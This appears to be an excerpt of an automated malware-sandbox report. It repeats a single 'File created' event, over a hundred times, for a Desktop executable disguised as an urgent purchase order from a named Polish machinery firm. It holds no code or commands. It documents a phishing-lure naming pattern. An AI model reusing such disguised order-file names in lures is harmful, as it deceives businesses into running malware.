Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	File created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe	Jump to behavior
